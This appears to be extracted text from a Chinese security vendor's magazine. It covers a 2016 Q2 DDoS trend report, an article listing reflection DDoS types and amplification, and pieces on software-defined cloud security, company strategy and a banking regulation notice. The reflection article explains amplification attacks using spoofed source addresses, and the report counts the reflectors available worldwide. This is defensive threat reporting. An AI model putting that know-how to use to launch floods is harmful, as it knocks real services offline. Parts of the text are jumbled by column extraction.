22 安全形势 本季度拥有最高攻击峰值的 DDoS 攻击发生在 5 月中旬, 引人注意的不仅是该次 DDoS 攻击的高峰值, 还有此次攻击是利用 TCP( 含 SYN RST ACK RST TCP Flag Misuse 等 ) 和 UDP 流量发起的混合攻击, 主要针对 TCP 和 UDP 53 端口, 攻击高峰持续了将近一个小时 针对同一目标的 DDoS 攻击, 从 4 月初就已经开始, 断断 续续直到 6 月底才彻底结束 除了上述混合 攻击外, 针对该目标, 攻击者还多次采用了 DNS Request Flood 和 UDP Flood 混合的 攻击时间趋势 Q2 平均攻击时长 1.6 小时, 单次攻击最长 387 小时 71T 脉冲攻击, 脉冲波峰和波谷持续时间不断变换, 有时半小时 1 次波峰, 有时 10 分钟一次波峰, 攻击者试图探测该目标流量处理能力的极限 对这些攻击进行溯源分析, 我们看到, 攻击者轮流调用分布在全球范围约 3 万 4 千个僵尸主机发起 DDoS 攻击 该僵尸网络主要为 Billgates botnet 的一个变种, 被控的主机大部分为带有高危漏洞或者弱口令的服务器, 攻击峰值较大的肉鸡主要来自云端, 另外少部分是被控制的网络监控摄像头 20

23 安全形势 Q2 季度平均攻击时长为 1.6 小时, 攻击时长在 30 分钟以下的攻击继续增长, 占总数的 77.6%, 比 Q1 季度增加 21.6% 本季度攻击时长超过 1 天的攻击占总攻击次数的 3.2%, 比上一季度下降了 8.7% 我们监控到最长的一次 DDoS 攻击持续了 387 小时, 累计总攻击流量达 71TBytes 以上几点变化反映了 Q2 季度 DDoS 攻击更趋于短时攻击 其主要原因在于本季度反射攻击 混合攻击 脉冲攻击更加活跃, 攻击者选择的攻击手段趋于复杂化, 使用更短的时间就达到更好的攻击效果 攻击类型趋势从攻击次数占比看,Chargen 发生攻击为 27.6%, 从攻击流量占比来看,SYN 为 54.7% 从攻击次数和攻击总流量占比来看, SYN Flood 攻击依然在所有攻击类型中占比重较大, 分别为 15.8% 54.7% 另外, Q2 季度各类型反射攻击比较活跃 从攻击次数占比来看,Q2 季度反射类型的攻击占总攻击次数的 62.1%, 其中 NTP 反射 CHARGEN 反射 SSDP 反射攻击较多 21

24 安全形势 混合攻击趋势从流量来看, 混合攻击占总比 33.7%, 其中 2-3 种混合攻击占 97.4% Q2 季度的 DDoS 攻击次数和大流量 DDoS 攻击事件相比 Q1 有所下降, 但攻击手段更加复杂, 我们观测到很多利用几种流量混合发起的攻击, 这类攻击相比单类型攻击, 对攻击目标网络破坏能力更强 从攻击总流量占比看, 利用混合攻击手段发起的攻击流量占总类型分布的 33.7% 我们对使用混合攻击手段发起的攻击进行分析, 统计其混合攻击使用的种类数占比情况, 如下图所示, 发现混合攻击中 2 至 3 种攻击类型的混合较为常见, 占总体分布的 97.4% Reflection Flood 和 UDP Flood 混合,CHARGEN Reflection 和 NTP Reflection Flood 混合, 也有部分是 NTP Reflection 和 SSDP Reflection Flood 混合 反射类型参与的混合攻击占全部混合种类的 23% 反射攻击趋势 Q2 季度反射类型攻击比较活跃, 绿盟科技对各类反射攻击的次数和流量分别进行了统计从攻击次数上看, 本季度 CHARGEN Reflection Flood 攻击最为活跃, 攻击次数占比 38.1%, 其次是 NTP 和 SSDP Reflection Flood 从攻击流量上来看,NTP Reflection Flood 攻击流量占比最多, 为 36.1%, 其次是 DNS Reflection Flood 攻击, 攻击流量占 比为 24.8% 另外, 对攻击者最常使用的混合类型做了统计 本季度最常见攻击混合类型为 SYN Flood 和 UDP Flood 攻击混合, 占全部混合类型的 36.1% 另外发现较多使用反射攻击流量混合的情况, 例如 NTP 22

25 安全形势 据绿盟科技最新统计, 目前全球范围内 NTP 反射器累计达 365 万个, 全球分布情况如下图所示, 其中美 俄 中 韩 日, 还有德 本季度被利用来发起 NTP Reflection Flood 攻击的反射器分布 情况如下图所示 国等欧洲地区 NTP 反射器分布最多 目前全球范围内 CHARGEN 反射器累计达 3.8 万个, 全球分布 情况如下图所示 其中意大利等欧洲地区 美国 韩国 中国等国 家 CHARGEN 反射器最多 本季度被利用来发起 CHARGEN Reflection Flood 攻击的反射 器分布情况如下图所示 23

26 安全形势 最全的反射型 DDoS 攻击 IIS 技术团队苗宇 关键词 :DDoS 反射攻击放大攻击摘要 : 当下最火的 DDoS 攻击方式是什么? 必须是反射型攻击 为什么? 全球范围内 NTP 反射器累计达 365 万个,CHARGEN 反射器累计达 3.8 万个 通过各种类型的反射器进行攻击, 流量峰值轻松达到 100G 本文给出笔者所整理的所有反射攻击类型 端口 放大比, 供研究者分析, 并期待解锁更多反射类型 一. 什么是反射型 DDoS 攻击 二. 反射型 DDoS 攻击的现状 图 1 反射型 DDoS 攻击概念图单来说, 攻击者伪造受害者的源 IP, 向互联网中的一些开放简服务器如 NTP DNS 服务器发送请求报文, 利用这些协议相 应包字节数远大于请求包的特点, 达到反射并放大流量的效果, 对 受害者造成大流量的 DDoS 攻击 图 2 反射型 DDoS 攻击占比 2014 年,CloudFlare 透露其客户遭受了当时最大的 400G NTP 反射攻击, 收到了业界的关注 根据 绿盟科技 2016 Q2 DDoS 态势报告, 2016 Q2 季度反射型攻击依然非常活跃, 占所有 DDoS 攻击类型的 62.1% 24

27 安全形势 从攻击次数上看,CHARGEN 反射攻击最为活跃, 占 38.1% 其次是 NTP 和 SSDP 反射攻击 从攻击流量上看,NTP 反射攻击占比最多, 为 36.1%, 其次是 DNS 反射攻击, 占比 24.8% 各种反射器的数量仍很惊人, 全球范围内 NTP 反射器累计达 365 万个 全球范围内 CHARGEN 反射器累计达 3.8 万个 而开放的 DNS 服务器, 更是达到 2170 万个 三. 最全的反射型 DDoS 攻击列表下表为笔者整理的所有反射攻击类型 端口 放大比, 供研究者分析, 也期待解锁更多反射类型 其中 NTP 以最高 的放大比排名榜首, 也是目前最常见的反射类型之一 图 3 全球 NTP 反射器分布 图 4 全球 CHARGEN 反射器分布 表 1 反射型 DDoS 攻击类型列表 25

28 安全形势 Security Fabric: 软件定义的弹性安全云 创新中心刘文懋 关键词 : 云安全 SDS 软件定义安全安全资源池摘要 : 软件定义安全的架构可成为对抗日益频繁安全事件的利器, 但在云计算环境中存在诸多落地困难的问题, 基于安全资源池的安全云方案可较好地解决软件定义的云安全解决方案在云计算中心部署的问题, 并能提供弹性 按需和敏捷的安全服务 软件定义 : 下一代的安全防护体系 着近年来网络欺诈 恶意勒索 高随级威胁 拒绝服务等越来越多的安 全事件出现在我们的面前, 大家纷纷意识到 信息安全的本质是人与人的对抗, 利益与利 动化的安全运营基础设施, 实现快速安全策略推送, 完成自适应安全中的终极 预测 一环 自从 Gartner 提出了软件定义安全, 这个概念已被越来越多的安全从业者所接受 与 SDN 类似, 将控制逻辑与数据处理分离, 提供高效的防护 检测 响应和预警机制 绿盟科技也在一年前开始了软件定义安全 SDS 的产品化之路, 下图就是去年发布智慧安全 2.0 时的软件定义安全架构全景图 益的冲突 中国的黑产市场已达千亿规模, 从业人员已超 150 万, 而国内信息安全市场大约为 200 亿人民币左右, 单个大型的信息安全公司的人数不过千余人, 要覆盖的大客户却达万家 可见与黑产交锋, 非协同不能与之对抗, 结合各家的威胁情报知识库和专家调查机制, 才能及时发现并阻止高级威胁 ; 非软件定义无以实现运营规模化, 借助百万规模的客户侧感知器获得无死角的实时安全 状态, 转换为云端的态势情报, 进而利用自 图 1 绿盟科技软件定义安全体系 26

29 安全形势 在安全控制平台侧,ESPC V7 在设计伊始就贯彻了分布式 自动化等理念, 形成安全控制平台的产品, 结合 BSA, 可实现安全控制和数据分析的综合性平台 ; 在安全设备侧,RSAS NF WAF IPS ADS 等产品也提供了一系列 RESTful 的应用接口, 可执行自动配置 安全策略下发和日志报表上传等功能 ; 在安全应用侧, 也开发了如下一代威胁防护平台 NTGP 态势感知, 以及与云杉合作开发的 Web 安全防护等应用 云安全的银弹? 我们曾提到, 产品从应用 控制和数据三个层面共同实现软件定义的安全防护体系, 可与实际部署的 IT 环境松耦合, 以较小的定制成本完成集成 目前绿盟科技完成了图中众多云平台和 SDN 网络的对接 借助 SDN 和服务链的先进技术, 我们可以实现对任意方向的流量进行按需的防护, 如图二中, 在入侵防护和 Web 安全防护的应用中, 通过 SDN 控制器的调度, 可将物理节点内部的虚拟机 VM1 的流量经过虚拟的 IPS 和虚拟 WAF, 处理之后再发送到 VM2 图 2 使用服务链和 SDN 技术可实现对虚拟机的按需防护一切看起来很美好, 是不是这个架构会成为云安全防护的银弹, 一举解决云平台内部流量不可见防护不可控的难题呢? 就目前我们的实践中来看,SDS 虽然解决了安全体系中控制与数据平面的解耦, 以及安全体系控制平面与云平台的计算 存储控制的解耦和, 但是不能解决安全体系中数据平面与云平台数据平面的解耦合, 也不能解决安全控制平面与云平台网络控制的解耦合 之所以说不能解决安全体系中数据平面与云平台数据平面的解耦和, 是因为如果利用云平台的应用接口管理安全设备生命周期, 就势必要让虚拟化的安全设备适配不同的云平台 Hypervisor, 如主流的 ESXi KVM 和 Xen, 以及基于以上并经过各种厂商定制化的 Hypervisor, 包括驱动适配 应用接口开发 虚拟机各项配置等, 其中的定制开发的成本是非常昂贵的 27

30 安全形势 而之所以说不能解决安全控制平面与云平台网络控制的解耦和, 是因为每个云平台的网络管理和控制方案均不相同,VMWare 有使用虚拟交换机的原生模式, 也有使用 以创建虚拟的安全设备, 也可以利用现有的硬件安全设备, 在这些设备的基础之上, 构建一个个具有不同能力的安全资源池 那么我们的安全控制平台, 就可以利用这些池化的能力, 提供诸如入侵防护 访问控制 Web 防护等安全功能 NSX 的 SDN 方案,Openstack 就更多了, 传统一些的 CSP(Cloud Service Provider, 云服务商 ) 使用网络虚拟化组件 Neutron 的方案, 激进一些的 CSP 使用 DragonFlow OpenDove 等与 Neutron 集成的 SDN 方案, 还有一些厂商自成一体, 有集成自家的网络虚拟化和 SDN 的方案, 使得安全厂商要花大量的精力制定和实施相应的适配方案 这两个问题造成的结果就是, 安全厂商往往缺乏一种统一的部署模式, 而是需要一家一家地去谈集成方案, 做定制需求, 经过一定开发周期后进行测试, 边际成本非常高 安全资源池云计算的本质是将各种计算 存储和网络变成了一个个资源池, 并对外提供相应的能力, 所以用户并不关心阿里云上的虚拟机到底在哪个物理位置 那么我们同样可以借鉴这样的思想, 在云计算中心中部署一个标准的专有安全区域, 在这个区域内, 我们可 图 3 各种形态的设备组成安全资源池当然, 安全控制平台要利用好这些资源, 自身也应具备很多分布式 弹性的机制, 如高可用 失效恢复 负载均衡和可扩展性等 同时安全控制平台可以在安全区域内部, 利用 SDN 和 NFV 技术实现服务链功能, 完成多种复合的安全功能 例如我们可以在数据中心的入口, 部署一个由若干物理安全节点组成的安全资源池, 处理南北向流量, 如图 4 所示 流量一到数据中心就进入了资源池的入口, 进而可以对这些从外向内流量进行如抗拒绝服务攻击 访问控制和 Web 防护等处理 28

31 安全形势 同样的, 可以在数据中心内部通过安全资源池的方式实现东西向流量的安全防护, 如在每个机架上放置一到两个物理安全节点, 那么该机架中的虚拟机流量可以进入安全节点, 进行处置后再被发送到目的地 当然, 为了平衡投资和效率, 需要考虑某机架上的安全节点过载时, 是将流量牵引到其他机架的安全节点, 还是在该机架上事先部署更多的安全节点, 或是限制安全防护 图 4 数据中心南北向的安全资源池部署 能力, 这是资源池管理平台需要考虑的问题 不过通过设计恰当的池化系统, 是可以保证资源池既能处理南北向流量, 也能处理东西向的内部流量, 实现对云计算系统的全方位防护 结论安全资源池解决了软件定义安全架构落地的最后一环 : 部署问题 借助池化技术, 用户可以不关心安全设备如何配置, 之前大量的网络拓扑规划 设备部署配置和系统联调, 都可以得到极大地简化 当然文中的一些设计, 例如利用 NFV 和 SDN 技术, 是当前的方法, 在今后还可能会使用其他技术, 例如容器 线程等技术, 图 5 数据中心内部东西向的安全资源池部署 实现更高的性能 29

32 封面故事 不忘初心回看转型 决策委员会叶晓虎 近几年, 整个安全行业发生了深刻最的变化 从个人 企业到国家, 都对 网络安全有了更新的认识和要求 新技术应 用 新思路和想法层出不穷, 这背后实际上 反应了在新形势下单一传统的安全产品无法 应对层出不穷的威胁 回顾这些年来, 我们开发出各种各样的 安全产品, 型号越来越多, 功能越来越复杂, 性能越来越高, 可是一个 心脏出血 漏洞 杀的所有人片甲不留, 狼狈不堪 一个漏洞 从出现 分析 制作升级包, 直到客户设备 升级, 需要经过很长的周期, 防守的速度完 全无力应对攻击, 防守体系千疮百孔 怎么 做才能使自己变得更快, 怎么做才能更快的 把能力交付给客户? 在 2010 年, 绿盟科技就启动了一个称 为 A 计划 的行动, 这是一个把客户和绿 盟紧密联系起来的构想 今天回头看, 这个 理念在当时是极具创新意识的, 但推进的并 不理想 这有各方面的原因, 一方面是支撑 A 计划构想的基础技术如大数据 云计算技 术还没有完全发展起来 ; 另一方面我们对客 户业务场景的理解还比较片面, 无法让客户 更好的接受 在今天, 安全大数据分析 连接 协 同防御已经深入人心, 无论是客户还是专业的安全厂商, 大家都意识到只有建立安全的生态圈, 防御集团才能更好地与攻击集团进行对抗 2014 年底的某一天, 沈总召集了技术线的相关负责人, 提出了转型的战略构想, 并组建了研讨小组 随后的一段时间, 研讨小组对国际国内的安全技术动向和安全态势进行热烈的分析和讨论, 做了相应的构想, 提出了公司需要从主要提供盒子产品, 转变成为客户提供解决方案和安全运营服务 这个构想经过管理层审议, 确定为公司的转型战略, 沈总命名为 P2SO P 即指产品,S 是 Solution,O 是 Operation 在新的战略下,P 并不是不重要了, 它仍是企业安全体系的关键节点, 是采集安全数据和执行安全策略的主体 S( 解决方案 ) 是指要理解客户的业务场景, 针对场景设计相应的能力组合 O( 运营 ) 是指在动态的安全生命周期内, 建立持续运营体系以改进企业安全态势, 并通过协同的方式将绿盟的安全能力快速交付给客户 在构想基本明确的同时, 公司进一步对组织架构 技术规划进行了调整, 同步展开相应的工作 终于, 在 2015 年 4 月全公司的员工收 到了一封沈总签署的邮件, 在这封题为 变成快公司, 永立数字浪潮之巅 的动员邮件中, 描述了慢公司和快公司在应对安全事件的几个场景下的不同, 号召全公司行动起来, 变成快公司 10 月, 绿盟科技对外发布了智慧安全 2.0 战略 这次发布, 向客户清晰的表达了绿盟科技对企业安全体系的理解和构思, 将智能 敏捷 可运营作为绿盟科技 P2SO 转型落地的要素体现 智能, 是指在 知己知彼, 百战不殆 思想的指导下, 帮助客户建立相应的数据平台, 应用大数据和机器学习的技术, 使得企业的安全态势一目了然, 挖掘发现针对企业的威胁活动 同时, 在绿盟云端监控互联网上发生的恶意行为, 在云端对安全事件和安全数据 30

33 封面故事 进行挖掘建模, 改进安全模型并推送给客户 敏捷, 是指在开放的体系架构下, 安全能力能够根据软件定义交付给客户, 加速企业安全能力的升级 可运营, 是指在客户侧和绿盟云端, 用户 绿盟本地专家 绿盟云端专家, 通过平台 系统或者设备紧密配合, 不断的改进企业安全能力 经过将近两年的努力, 应该说我们初步达成了当年沈总邮件里提出的几个场景 我们推出了自己的安全大数据分析平台 态势感知系统 攻击溯源与威胁分析系统 威胁情报中心, 设计实现了 NGTP 云计算安全等解决方案, 并得到了客户的认可 这些系统已经多次应用在重大活动安保工作中 2016 年初建立了 NSRC, 梳理了应急响应流程并建立了相应的支撑系统, 在今年上半年出现的高危漏洞应急响应中基本达到了小时级的要求 另一方面, 绿盟科技的研究团队应用机器学习的方法, 建立了一套攻击检测系统, 这套系统通过监控互联网上的恶意行为更新学习能力, 并通过安全专家的修正, 各项指标比传统的检测模型有了大幅度的改进 这项改进在应用到产品上之后, 使各项指标都有大幅度提升, 相关工作也得到了国际同行的认可 研究团队还通过威胁情报和恶意样本分析系统, 为客户提供威胁活动和溯源分析的服务 这几年来, 我们的速度变快了, 但还需要变得更快 我们需要更多的人参与到创新的过程中来 随即, 公司从 2015 年年初开始, 定期举办全员参与的 P2SO 创新达人秀活动 正是这个活动, 让绿盟科技近 15 年的安全产品和服务积累经验及热情迸发出来, 很多来自一线的工程师和销售将自己对客户业务的深刻理解, 形成很多很好的想法, 带到产品中来, 带到解决方案中去, 这也给在后端的研究和开发人员带去了非常多的启示, 一些好的项目正在不断涌现并孵化出来 希望在不久的将来, 能够有更多用户参与到我们的创新过程中来 变得更快, 还需要我们建立更智能化的系统, 将单点的人与人的对抗, 变成系统的对抗 我们设想实现相应的学习系统, 这个系统具备自我提升的能力, 通过系统来改变攻防不对称的形势 变得更快, 还需要我们有学习的精神 对技术的敏锐和开放的心态 从 2016 年初 开始, 我们启动了小蜜蜂公益翻译, 选取国外有影响力的文章进行翻译, 希望通过翻译, 一方面是加强自身学习, 另一方面可以更多的和同行进行交流 借助这些年来的国际化战略, 绿盟科技也建立了国际化的业务和技术研究团队, 这使得我们的视野更加开阔 在 2016 年 RSA 的展会上, 已经完全由我们的国际同事担当 变得更快, 还需要我们与合作伙伴一起跑起来 这两年来, 从绿盟云开始, 我们积极开展对外合作, 与很多家公司建立合作关系, 包括阿里云 UCLOUD 青云等 绿盟积极的邀请业内专家到公司讲课 研讨, 通过思想的碰撞使得我们的思路更为开阔 有人说绿盟科技是个低调的公司 这一切源起于我们希望能够得到客户的信任, 希望能更好为客户服务, 成为巨人背后的安全专家, 保障客户业务的顺利运行 我们根据智慧安全 2.0 的构思设计了绿盟企业自身的安全体系, 所有的产品在绿盟内部进行应用, 对设计的目标和想法在内部进行反复的验证 我们希望把最好的东西呈现给客户, 而不是随意的向客户承诺 精益求精的工匠精神是绿盟科技的特质, 这点和 15 年前我加入的绿盟科技, 没有改变 31

34 行业热点 刍议云计算安全与安全服务化 政府技术部张智南 关键词 : 云计算云计算安全安全服务化摘要 : 随着信息系统向云端迁移成为趋势, 云计算信息系统的安全防护必将采用安全服务的方式 云服务商在基础安全服务之外, 为不同的安全需求提供安全增值服务 同时, 云安全规划服务 云安全专业服务和云安全运营服务成为信息系统运营使用单位的必然选择 在攻防技术发展和云计算安全防护需求的双重推动下, 安全服务化已经成为发展趋势 一. 引言 云计算技术 已经成为 IT 界的高频词汇 但是, 如果从抠字眼的角度来说这个说法并不严谨 业界广为接受的云计算定义是美国国家标准与技术研究所 (National Institute of Standards and Technology, 简称 NIST) 给出的 [1] :Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction 显然,NIST 将云计算定义为一种模式 (model) 而不是一种技术 ( technology) 在中国的云计算相关的国家标准中, 也基本引用的这个定义 [2] : 云计算是通过网络访问可扩展的 灵活的物理或虚拟共享资源池的模式, 资源可按需自助获取和管理 这就表明, 如果服务商提供的服务能够呈现出按需自服务 (On-demand self-service) 泛在接入 (Broad network access) 资源池化 ( Resource pooling) 快速弹性架构 ( Rapid elasticity) 服务可度量 ( Measured service) 等特点 [1], 就可以称为一种云计算服务, 无论它底层采用的是何种技术 因此, 可以说云计算的本质就是一种服务 二. 云计算安全及其服务化信息安全等级保护是我国当前在网络和信息系统防护的基本制度 在公安部等四部委联合印发的 信息安全等级保护管理办法 中 32

35 行业热点 明确规定 : 信息系统的运营 使用单位应当依照本办法及其相关标准规范, 履行信息安全等级保护的义务和责任 在云计算兴起之前, 网络和信息系统以自运维为主, 信息系统的运营 使用单位是同一个团队 安全防护也是本地运维团队的责任 而在云计算模式下, 一部分运营责任转移到云服务商 (Cloud Service Provider, 简称 CSP), 而且不同的云服务模式其运营责任也不同, 如图 1 所示 : 件由本地转移到了云服务商机房, 计算资源也采用动态调配方式, 传统地基于硬件设备进行防护的机制不再适用 同时对于运营使用单位来说, 云计算已经是作为服务被采购, 安全通过服务的形式采购也就不再是什么出位的举措 因此, 可以说云计算的特性决定了云计算安全必然走向服务化的道路 三. 云计算安全服务化形态不同的责任方对安全的需求不同, 也就决定了其服务化形态的不同 下面分别从云服务商和信息系统运营使用单位两方分别讨论 3.1 云服务商云服务商的安全需求可以分为两类 : 一类是保证云平台的安全, 可以称为基础安全需求 ; 另一类是面向客户信息系统提供差异化的安全防护, 可以称为增值安全需求 基础安全需求中, 身份认证 访问控制 入侵检测 恶意代码检测等面向网络层的安全防护是需求的主体 基础安全需求的需求 图 1 服务模式与控制范围的关系 [2] 基于云计算的信息系统的安全运营也遵从这种模式, 其安全防护业务和责任也从信息系统的运营使用单位部分地转移到了云服务商 对于服务商来说, 一方面保护客户的信息系统安全是其能够获得客户信任获取订单的前提, 是其必须认真履行的义务和责任 ; 另一方面针对不同的客户需求提供差异化的安全服务, 也是一个重要的盈利模式 对于网络和信息系统的运营使用单位来说, 由于承载系统的硬 方一般是云服务商 为满足需求, 有实力的云服务商会自建安全团队实施安全运维, 如阿里云的云安全部门 ; 而有些云服务商则将云安全运维委托给专业的第三方, 以购买服务方式进行 而在一些私有云中, 由于运营使用单位将云基础设施也托管给了第三方 ( 包括云服务商 ), 因此在基础安全方面, 也提出了服务化的方式 在这种情况下, 专业的安全服务团队往往以 设备 + 服务 的模式向需求方提供安全运维保障, 并通过 SLA(Service-Level Agreement, 服务等级协议 ) 协议约定双方的责任 33

36 行业热点 增值安全需求通常是根据信息系统的具体情况分别提出的, 如对一般网站的防注入 防跨站需求, 对网络游戏的防 DDoS 需求, 对政务网站的防篡改需求等 为满足这些业务需求, 云服务商通常以用户可选服务模式提供安全服务, 这也体现了云计算的用户自服务的特点 如图 2 所示 : 运营服务 安全咨询服务和安全专业服务在非云计算领域也应用非常广泛 在云计算环境下也只是根据云计算的特点对相关内容加以扩 充 其中, 安全咨询服务主要是依据国际 / 国内标准和行业监管规范, 协助信息系统运营使用单位立足于现状, 面向信息安全风险, 采取适当的管理过程和控制措施, 建立和维护全面 有效 合规的信息安全管理体系, 保障业务运营和战略达成 云安全咨询服务主要是在传统咨询服务的基础上, 进一步将云计算相关的安全标准和行业监管规范 如 信息安全技术云计算服务安全能力要求, 即将实施的云计算等级保护系列标准等 囊括进来, 建立符合云计算安全需 图 2 某云服务商提供的安全增值服务 求的合规管理和认证体系 云安全专业服务 3.2 信息系统运营使用单位信息系统运营使用单位虽然通过将业务系统转移到云端, 并将一部分安全防护责任分担给了云服务商, 但由于其作为信息系统的所有者, 依然需要担负起最终的安全责任 同时, 由于信息系统应用了资源池化的基础设施, 即通过云计算的模式提供服务, 这就要求相关的安全防护也必须选择与之相匹配的形式 在这种条件下, 以服务的形式提供安全防护就成为了最佳选择 面向云计算的安全服务大体上可分为三类 : 云安全咨询服务 云安全专业服务和云安全 与安全咨询服务类似, 也是将云计算作为服务实施的一个重要因素加以考虑 如云安全体系规划 云安全架构设计, 以及基于云计算平台脆弱性的渗透测试等方法 云安全专业服务通过全面感知云端业务系统的安全缺陷, 协助信息系统运营使用单位优化资源配置, 加强信息系统的全生命周期安全防护 34

37 行业热点 与上述两类服务不同的是, 云计算模式为安全运营服务提出了更多新的要求 首先, 云服务商提供的基础安全服务的防护能力和防护效果如何评估, 是否能够持续满足业务系统基本安全需求 ; 其次, 在多种可选的安全增值服务条件下, 如何针对云端系统的业务安全需求进行最优化配置, 满足不同业务的个性化安全需求 ; 第三, 包括云服务商基础安全服务 云端增值安全服务以及面向云端业务安全的其它需求 如数据防泄漏 加密等 如何进行统一的调配 实施和管理 为了解决上述问题, 国际著名咨询服务机构 Gartner 提出了云安全接入代理 ( Cloud Access Security Broker, 简称 CASB) 的概念, 如图 3 所示 : ( 无论是盒子形态还是服务形态等 ) 对云计算服务的安全性进行评估 监督和保护已经成为一种趋势 随着信息系统从本地迁往云端, 本地运维转换成了云端远程运维, 本地资源转换成了云计算服务, 原先本地的安全运维也需要根据具体的安全需求转换成相应的安全服务 四. 安全服务化已经是大势所趋纵览当前信息技术的发展状况, 安全服务化已经是大势所趋 这至少表现在两个方面 首先, 攻防技术发展越来越快 一个漏洞从被公开到形成大规模的网络攻击, 往往不超过 72 小时 而即使安全设备厂商快速做出响应, 发布升级包, 还需要信息系统运营使用单位的运维团队及时升级设备, 正确设置安全策略 这个流程往往时间较长, 总体呈现出一个 攻快守慢 的局面 传统的以采购安全硬件产品实施自运维的方式已经逐 图 3 CASB 逻辑结构如图所示,CASB 可以简单理解为部署在云服务使用者和提供商之间的安全控制点 这个控制点通过整合多种安全技术 ( 如云服务发现与评级, 单点登录, 设备与行为识别, 加密, 凭证化等 ), 并辅以企业的安全策略, 帮助企业在云上资源被连接访问的过程中加以监控和防护 CASB 的提出标志着信息系统运营使用单位通过使用第三方服务机构提供的安全服务 渐不能适应当前快速发展的攻防技术的变化 其次, 安全防护对人的要求越来越高 随着地下黑色产业链的不断壮大, 各种 0day 漏洞正在大行其道 基于 0day 漏洞的网络攻击, 可以轻易穿透传统的安全防护设备 35

38 行业热点 当前主流的防护方法是基于行为特征和威胁情报相结合的综合分析方法 这类方法对人员的要求非常高, 要求相关人员既能从纷繁复杂的系统日志中找出攻击的痕迹, 又要能根据检测到的软件运行数据中判断是否存在恶意行为, 还要能海量的威胁情报中获取与自己系统相关性最强的信息, 在攻击发生之前先行防护 非安全专业团队对这样高的要求往往是有心无力 安全防护正在变得越来越主动, 越来越依赖专业的安全团队 以服务的形式提供安全防护能力, 能有效提高安全事件的响应速度, 有效提高安全威胁的识别效率, 有效提高安全防护的总体水平 总之, 安全服务化已经成为当前信息安全行业的发展趋势, 必将在今后的发展中成为安全防护的主要方式 五. 安全服务化趋势下安全防护的转变在安全服务化的趋势下, 信息系统运营使用单位 云服务商 安全服务商总体上形成一个相关支撑的关系, 如图所示 : 对于信息系统运营使用单位, 一方面通过安全服务商从安全角度评估云服务, 选择其中满足自身安全需求的云服务商, 并使用安全服务商提供的对云端信息系统的安全预警 防护 检测和响应服务 ; 另一方面通过云服务商选择能够与其云服务匹配的安全服务或要求云服务商为安全服务商提供服务接口, 接入指定的安全服务 对于安全服务商, 首先要从传统的设备附加服务的设备提供商向服务附加设备的服务提供商转变, 以专业的安全服务作为立身之本 其次, 要面向客户安全需求, 设计可运营的安全服务产品, 为客户提供集预警 防护 检测和响应一体的快速 闭环的安全服务 第三, 要与云服务商协作, 一方面帮助云服务商建立全面 合规的基础安全防护体系 ; 另一方面将安全能力资源池化, 统一纳入到云服务商的整体云平台之中, 为客户提供可选的安全增值服务 总之, 在安全服务化的浪潮之下, 无论是信息系统运营使用单位 云服务商还是安全服务商, 都必须顺应潮流 及时调整, 才能在信 息化高速发展过程中始终立于不败之地 参考文献 [1] NIST SP :The NIST Definition of Cloud Computing [2] GB/T 信息安全技术云计算服务安全能力要求 [3] Cloud Security Alliance :SECURITY GUIDANCE FOR 图 4 相互支撑关系 CRITICAL AREAS OF FOCUS IN CLOUD COMPUTING V3.0 36

39 行业热点 解读银监办发 [2016]107 号文 政府技术部张智南 关键词 : 银监会国家关键信息基础设施安全风险专项评估摘要 : 银监办发 [2016]107 号指出, 银行业网络和重要信息系统是国家关键信息基础设施, 为进一步加强互联网安全风险应对, 提升银行业整体防护能力, 按照国家关键信息基础设施保护 网络安全风险专项应对工作的整体安排, 决定组织开展银行业网络安全风 016 年 6 月 27 日银监办发 [2016]107 2号 中国银监会办公厅关于开展银行业 网络安全风险专项评估治理及配合做好关 键信息基础设施网络安全检查工作的通知 ( 简称 通知 ) 正式发布 通知指出, 银行 业网络和重要信息系统是国家关键信息基础 设施, 为进一步加强互联网安全风险应对, 提升银行业整体防护能力, 按照国家关键信 息基础设施保护 网络安全风险专项应对工 作的整体安排, 决定组织开展银行业网络 安全风险专项评估治理工作 同时, 根据中 央网信办 关于开展关键信息基础设施网络 安全检查的通知 ( 中网办发文 [2016]3 号 ) 的要求, 需要各银监局 银行业金融机构认 真做好国家关键信息基础设施网络安全检查 相关工作 险专项评估治理工作 通知共分两个部分 : 第一部分是银行业网络安全风险专项评估治理, 提出四个工作要求, 包含 :( 1) 网络和信息系统安全风险评估 (2) 高级持续性威胁专项评估 (3) 网络安全应急预案评估 (4) 网络安全应急演练, 明确了各银监局 各政策性银行 大型银行 股份制银行 邮储银行 中央结算公司需要开展的网络安全评估治理工作 第二部分是中央网信办要求的关键信息基础设施网络安全检查有关工作, 包含 :( 1) 银行业金融机构积极配合完成关键信息基础设施网络安全检查 ( 2) 银监会系统关键信息基础设施网络安全检查, 此部分工作主要是各银行业金融机构和各银监局按照中网办发文 [2016]3 号文要求做好关键信息基础设施的网络安全信息报送工作 通知的核心内容是开展银行业网络安全风险专项评估治理工作, 该部分内容也是以银行业近年发生的安全事件为出发点, 总结银行业面临的安全风险, 制定相应的监管要求和自查工作安排, 避免银行业遭受攻击, 从而防患于未然 工作要求 网络和信息系统安全风险评估 安全挑战 截止 2016 年 7 月, 国内某漏洞平台统计数据显示, 国内银行业金融机构在互联网上提供服务的信息系统存在 3000 余个安全漏洞, 其中银行业存在 1000 多个高危漏洞, 证券行业存在 800 多个高危漏洞 文件要求 银行业金融机构要对数据中心基础设施 信息系统开展一次全面的网络安全风险专项评估, 针对内外部网络攻击 37

40 行业热点 威胁, 评估信息系统提供持续服务的能力和数据安全保护水平, 重点关注安全管理制度和网络安全防护技术体系的有效性, 摸清底数 查找短板, 制定威胁应对方案 工作内容分解如下 : 评估目标评估要点评估工具报告要点 互联网业务系统 ( 包括客户端 移动应用 ) 门户网站 安全管理措施第三方外联系统, 数据中心技术防护措施基础设施 通讯网络以及后网络攻击威胁台系统 ( 包含管理信息系统 失泄密风险办公系统 ) 管理调研架构分析渗透测试 App 测试二进制测试 问题描述风险分析风险等级应对措施整改计划 专家建议 随着银行业金融机构的高速发展, 互联网相关业务也越来越丰富, 也暴露出越来越多的安全风险, 监管机构也开始及其关注其安全风险, 而风险评估工作也逐渐成为银行业金融机构的常态化网络安全工作的重要部分, 银行业金融机构安全评估办法 电子银行安全评估指引 商业银行信息科技风险管理指引 等要求成为风险评估的标准和规范, 指导银行业金融机构完成风险评估工作 而本次网络安全风险专项评估提出了更高标准的要求, 评估 A : 不能, 但可作为风险评估的补充, 减少重复工作 渗透测试是风险评估的技术检查部分的工作 ; 而等保测评与风险评估有一定联系, 但还是存在区别, 